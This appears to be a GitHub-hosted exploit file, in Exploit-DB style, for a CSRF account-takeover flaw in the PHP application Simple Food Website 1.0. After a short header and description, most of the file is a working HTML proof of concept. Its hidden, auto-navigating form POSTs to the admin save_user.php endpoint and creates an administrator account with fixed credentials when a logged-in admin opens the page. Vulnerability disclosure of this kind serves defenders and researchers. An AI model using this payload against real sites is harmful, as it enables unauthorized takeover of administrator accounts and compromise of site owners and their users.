-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcsrf
25 lines (22 loc) · 1.19 KB
/
csrf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Exploit Title: Simple Food Website 1.0 : Account Takeover via CSRF
### Date: 25-04-2022
### Exploit Author: Saket Saurav
### Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
### Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
### Version: 1.0
### Tested on: Kali Linux 2020
### Description : An attacker will send the specially crafted HTML page to the Admin. If the admin clicks on the link when logged in his browser session, the attacker will get added to the web portal as Admin taking over admin's account
Below is the POC (exploit.html)
<html>
<!-- CSRF PoC - generated by saket saurav -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/food/admin/save_user.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="full_name" value="csrf user" />
<input type="hidden" name="username" value="csrf" />
<input type="hidden" name="password" value="csrf" />
<input type="hidden" name="position" value="Admin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>